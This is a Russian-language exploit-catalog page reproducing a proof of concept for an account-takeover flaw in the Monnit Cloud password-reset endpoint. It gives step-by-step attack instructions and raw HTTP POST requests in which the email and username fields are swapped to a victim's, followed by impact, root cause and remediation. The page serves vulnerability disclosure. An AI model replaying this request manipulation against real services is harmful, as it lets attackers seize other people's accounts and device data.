Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-50433 — Доказательство концепции критического захвата учётной записи Monnit Cloud (CVE-2025-50433), эксплуатирующего отсутствие проверки соответствия токена и email при сбросе пароля, с описанием шагов атаки, первопричины и мер по устранению. | Kitploit
Инструменты/GitHubGitHub/0xmandor/cve-2025-50433
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеАутентификация
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

Доказательство концепции критического захвата учётной записи Monnit Cloud (CVE-2025-50433), эксплуатирующего отсутствие проверки соответствия токена и email при сбросе пароля, с описанием шагов атаки, первопричины и мер по устранению.

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-50433 — Критическая уязвимость перехвата аккаунтов, затрагивающая облачные платформы Monnit (*.imonnit.com)

Краткое описание

Критическая уязвимость аутентификации существует в *.imonnit.com, позволяющая полный перехват управления аккаунтом (Account Takeover, ATO) любого пользователя без взаимодействия с жертвой.

Бэкенд не проверяет соответствие между токеном сброса пароля и целевой электронной почтой, что позволяет злоумышленникам использовать свой собственный действующий токен сброса для изменения пароля любого аккаунта жертвы.


Вектор атаки (пошаговое PoC)

  1. Злоумышленник создает аккаунт A ([email protected]).
  2. Жертва имеет аккаунт B ([email protected]).
  3. Злоумышленник запрашивает сброс пароля для A и B.
  4. Злоумышленник получает действующий токен сброса только для аккаунта A.
  5. Злоумышленник открывает форму сброса пароля, используя токен :
A
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. Перед отправкой злоумышленник изменяет поля email и username на email жертвы:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. Бэкенд некорректно принимает несовпадающие email и токен.
  2. Пароль жертвы сброшен, и злоумышленник получает полный доступ к аккаунту жертвы.

Влияние

  • Полный перехват управления аккаунтом (ATO).
  • Полный доступ к панелям управления, датчикам и данным жертвы.
  • Возможность изменять устройства, уведомления и конфигурации.
  • Повышение привилегий без взаимодействия с жертвой.
  • Удаленная эксплуатация без каких-либо предварительных условий.

Серьезность

CVSS 3.1: 9.8 (Critical)
Вектор: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Затронутые домены

root@kitploit:~
*.imonnit.com

Корневая причина

Конечная точка сброса пароля не проверяет, принадлежит ли токен сброса тому же адресу электронной почты, который был указан при операции сброса, что позволяет произвольный сброс пароля с использованием токена, контролируемого злоумышленником.


Затронутая конечная точка

root@kitploit:~
/Account/PasswordReset/

Продавец: Monnit Corporation


Рекомендации

  • Внедрить строгую проверку привязки «токен-email» на стороне бэкенда.
  • Отклонять любой запрос на сброс пароля, в котором токен не соответствует связанному аккаунту.
  • Аннулировать токены сразу после использования.

Автор находки

Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

Скачать инструмент